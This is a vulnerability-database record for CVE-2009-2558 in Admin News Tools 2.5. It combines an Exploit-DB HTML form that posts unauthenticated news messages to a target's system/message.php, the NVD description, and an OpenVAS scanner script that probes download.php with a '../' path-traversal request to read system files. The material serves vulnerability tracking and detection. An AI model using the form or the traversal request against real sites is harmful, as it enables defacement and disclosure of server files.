{"id": "EDB-ID:9161", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Admin News Tools Remote Contents Change Vulnerability", "description": "Admin News Tools Remote Contents Change Vulnerability. CVE-2009-2558. Webapps exploit for php platform", "published": "2009-07-15T00:00:00", "modified": "2009-07-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9161/", "reporter": "Securitylab.ir", "references": [], "cvelist": ["CVE-2009-2558"], "lastseen": "2016-02-01T10:00:16", "viewCount": 7, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-01T10:00:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2558"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900905"]}], "modified": "2016-02-01T10:00:16", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/9161/", "sourceData": "<html>\n<!-- Securitylab.ir , info@securitylab.ir -->\n<head>\n</head>\n<body>\n<center>\n<center>\n<p><b><font size=\"+2\">Admin News Tools<i> </i></font><font size=\"2\">Remote\nContents Change Vulnerability</font></b></p>\n</center>\n<form action=\"http://site.com/news/system/message.php\" method=\"post\">\n <div><br>\n <textarea cols=\"89\" rows=\"12\" name=\"message\"></textarea>\n <p>\n <input value=\"Send\"\n onclick=\"this.setAttribute('value','...');\"\n type=\"submit\"></p>\n </div>\n <p>Just for Fun\n </p>\n <p></p>\n</form>\n</center>\n</body>\n</html>\n\n# milw0rm.com [2009-07-15]\n", "osvdbidlist": ["56235"]}

{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "system/message.php in Admin News Tools 2.5 does not properly restrict access, which allows remote attackers to post news messages via a direct request.", "edition": 3, "cvss3": {}, "published": "2009-07-21T17:30:00", "title": "CVE-2009-2558", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2558"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:adminnewstools:admin_news_tools:2.5"], "id": "CVE-2009-2558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2558", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adminnewstools:admin_news_tools:2.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:33:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2558", "CVE-2009-2557"], "description": "This host is installed with Admin News Tools and is prone to\n multiple vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2009-07-31T00:00:00", "id": "OPENVAS:1361412562310900905", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900905", "type": "openvas", "title": "Admin News Tools Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Admin News Tools Multiple Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adminnewstools:admin_news_tools\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900905\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-31 07:37:13 +0200 (Fri, 31 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-2557\", \"CVE-2009-2558\");\n script_name(\"Admin News Tools Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_admin_news_tools_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ANT/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to bypass security\n restrictions by gaining sensitive information and redirect the user to other malicious sites.\");\n\n script_tag(name:\"affected\", value:\"Admin News Tools version 2.5.\");\n\n script_tag(name:\"insight\", value:\"- Input passed via the 'fichier' parameter in 'system/download.php' is not\n properly verified before being processed and can be used to read arbitrary files via a .. (dot dot) sequence.\n\n - Access to system/message.php is not restricted properly and can be\n exploited to post news messages by accessing the script directly.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Admin News Tools version 3.0 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Admin News Tools and is prone to\n multiple vulnerabilities.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/35842\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9161\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9153\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/51780\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.adminnewstools.fr.nf/\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif(dir == \"/\")\n dir = \"\";\n\nif(host_runs(\"windows\") == \"yes\") {\n files = traversal_files(\"windows\");\n foreach file ( keys( files ) ) {\n url = dir + \"/news/system/download.php?fichier=./../../../../../\" + files[file];\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n} else {\n files = traversal_files(\"linux\");\n foreach file ( keys( files ) ) {\n url = dir + \"/news/system/download.php?fichier=../../../../../../\" + files[file];\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}